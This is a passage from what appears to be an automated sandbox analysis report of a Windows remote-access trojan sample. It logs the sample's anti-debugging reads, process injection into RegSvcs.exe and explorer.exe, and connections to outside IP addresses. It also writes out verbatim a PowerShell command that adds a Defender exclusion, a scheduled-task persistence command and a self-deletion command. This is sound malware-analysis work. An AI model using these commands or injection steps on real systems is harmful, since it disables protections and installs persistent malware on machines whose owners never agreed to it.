Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0112CDEA mov eax, dword ptr fs:[00000030h] 7_2_0112CDEA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0112CDEA mov eax, dword ptr fs:[00000030h] 7_2_0112CDEA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01140C00 mov eax, dword ptr fs:[00000030h] 7_2_01140C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01140C00 mov eax, dword ptr fs:[00000030h] 7_2_01140C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01140C00 mov eax, dword ptr fs:[00000030h] 7_2_01140C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01140C00 mov eax, dword ptr fs:[00000030h] 7_2_01140C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011B4C0F mov eax, dword ptr fs:[00000030h] 7_2_011B4C0F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0116CC00 mov eax, dword ptr fs:[00000030h] 7_2_0116CC00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0112EC20 mov eax, dword ptr fs:[00000030h] 7_2_0112EC20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0113AC50 mov eax, dword ptr fs:[00000030h] 7_2_0113AC50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0113AC50 mov eax, dword ptr fs:[00000030h] 7_2_0113AC50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0113AC50 mov eax, dword ptr fs:[00000030h] 7_2_0113AC50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0113AC50 mov eax, dword ptr fs:[00000030h] 7_2_0113AC50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0113AC50 mov eax, dword ptr fs:[00000030h] 7_2_0113AC50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0113AC50 mov eax, dword ptr fs:[00000030h] 7_2_0113AC50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01136C50 mov eax, dword ptr fs:[00000030h] 7_2_01136C50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01136C50 mov eax, dword ptr fs:[00000030h] 7_2_01136C50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01136C50 mov eax, dword ptr fs:[00000030h] 7_2_01136C50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01164C59 mov eax, dword ptr fs:[00000030h] 7_2_01164C59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01150C44 mov eax, dword ptr fs:[00000030h] 7_2_01150C44
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01150C44 mov eax, dword ptr fs:[00000030h] 7_2_01150C44
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0113CC74 mov eax, dword ptr fs:[00000030h] 7_2_0113CC74
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01128C8D mov eax, dword ptr fs:[00000030h] 7_2_01128C8D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01158CB1 mov eax, dword ptr fs:[00000030h] 7_2_01158CB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01158CB1 mov eax, dword ptr fs:[00000030h] 7_2_01158CB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011B4CA8 mov eax, dword ptr fs:[00000030h] 7_2_011B4CA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011ACCA0 mov ecx, dword ptr fs:[00000030h] 7_2_011ACCA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011ACCA0 mov eax, dword ptr fs:[00000030h] 7_2_011ACCA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011ACCA0 mov eax, dword ptr fs:[00000030h] 7_2_011ACCA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011ACCA0 mov eax, dword ptr fs:[00000030h] 7_2_011ACCA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01128CD0 mov eax, dword ptr fs:[00000030h] 7_2_01128CD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01142CDC mov eax, dword ptr fs:[00000030h] 7_2_01142CDC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01142CDC mov eax, dword ptr fs:[00000030h] 7_2_01142CDC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01142CDC mov eax, dword ptr fs:[00000030h] 7_2_01142CDC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0112CCC8 mov eax, dword ptr fs:[00000030h] 7_2_0112CCC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01162CF0 mov eax, dword ptr fs:[00000030h] 7_2_01162CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01162CF0 mov eax, dword ptr fs:[00000030h] 7_2_01162CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01162CF0 mov eax, dword ptr fs:[00000030h] 7_2_01162CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01162CF0 mov eax, dword ptr fs:[00000030h] 7_2_01162CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01132F12 mov eax, dword ptr fs:[00000030h] 7_2_01132F12
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0116CF1F mov eax, dword ptr fs:[00000030h] 7_2_0116CF1F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01174F03 mov eax, dword ptr fs:[00000030h] 7_2_01174F03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0115EF28 mov eax, dword ptr fs:[00000030h] 7_2_0115EF28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0112CF50 mov eax, dword ptr fs:[00000030h] 7_2_0112CF50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0112CF50 mov eax, dword ptr fs:[00000030h] 7_2_0112CF50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0112CF50 mov eax, dword ptr fs:[00000030h] 7_2_0112CF50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0112CF50 mov eax, dword ptr fs:[00000030h] 7_2_0112CF50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0112CF50 mov eax, dword ptr fs:[00000030h] 7_2_0112CF50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0112CF50 mov eax, dword ptr fs:[00000030h] 7_2_0112CF50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0116CF50 mov eax, dword ptr fs:[00000030h] 7_2_0116CF50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01142F5B mov eax, dword ptr fs:[00000030h] 7_2_01142F5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01142F5B mov eax, dword ptr fs:[00000030h] 7_2_01142F5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01142F5B mov eax, dword ptr fs:[00000030h] 7_2_01142F5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01142F5B mov eax, dword ptr fs:[00000030h] 7_2_01142F5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01142F5B mov eax, dword ptr fs:[00000030h] 7_2_01142F5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01142F5B mov eax, dword ptr fs:[00000030h] 7_2_01142F5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01142F5B mov eax, dword ptr fs:[00000030h] 7_2_01142F5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0113AF42 mov eax, dword ptr fs:[00000030h] 7_2_0113AF42
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0113AF42 mov eax, dword ptr fs:[00000030h] 7_2_0113AF42
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0113AF42 mov eax, dword ptr fs:[00000030h] 7_2_0113AF42
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01142F47 mov eax, dword ptr fs:[00000030h] 7_2_01142F47
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01142F47 mov eax, dword ptr fs:[00000030h] 7_2_01142F47
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01142F47 mov eax, dword ptr fs:[00000030h] 7_2_01142F47
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01142F47 mov eax, dword ptr fs:[00000030h] 7_2_01142F47
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01142F47 mov eax, dword ptr fs:[00000030h] 7_2_01142F47
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01142F47 mov eax, dword ptr fs:[00000030h] 7_2_01142F47
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01142F47 mov eax, dword ptr fs:[00000030h] 7_2_01142F47
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011B4F40 mov eax, dword ptr fs:[00000030h] 7_2_011B4F40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011B4F40 mov eax, dword ptr fs:[00000030h] 7_2_011B4F40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011B4F40 mov eax, dword ptr fs:[00000030h] 7_2_011B4F40
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00722E62 GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 15_2_00722E62
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00726510 SetUnhandledExceptionFilter, 15_2_00726510
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_007261C0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 15_2_007261C0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\explorer.exe Network Connect: 157.53.227.1 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 172.67.134.182 80 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\KfYvtUBOq.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\KfYvtUBOq.exe" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe NtQueueApcThread: Indirect: 0xFEA4F2 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe NtClose: Indirect: 0x111A56C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe NtQueueApcThread: Indirect: 0x111A4F2 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe NtClose: Indirect: 0xFEA56C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Section loaded: NULL target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Section loaded: NULL target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Section loaded: NULL target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Section loaded: NULL target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\rundll32.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread register set: target process: 4004
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread register set: target process: 4004
Source: C:\Windows\SysWOW64\rundll32.exe Thread register set: target process: 4004
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread APC queued: target process: C:\Windows\explorer.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Section unmapped: C:\Windows\SysWOW64\rundll32.exe base address: 720000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Section unmapped: C:\Windows\SysWOW64\rundll32.exe base address: 720000
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 997008
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: A08008
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\KfYvtUBOq.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\KfYvtUBOq" /XML "C:\Users\user\AppData\Local\Temp\tmp89CA.tmp"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\KfYvtUBOq" /XML "C:\Users\user\AppData\Local\Temp\tmp9563.tmp"
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: explorer.exe, 00000009.00000002.4571895416.00000000013A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.2140613728.00000000013A0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: IProgram Manager
Source: explorer.exe, 00000009.00000002.4571895416.00000000013A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.2140613728.00000000013A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000002.4574433830.00000000048E0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000009.00000002.4571895416.00000000013A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.2140613728.00000000013A0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000009.00000002.4570236364.0000000000D60000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2139208430.0000000000D69000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: +Progman
Source: explorer.exe, 00000009.00000002.4571895416.00000000013A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.2140613728.00000000013A0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 00000009.00000000.2154297535.00000000098AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3075211732.00000000098E0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979149239.00000000098AD000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd31A
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe Queries volume information: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
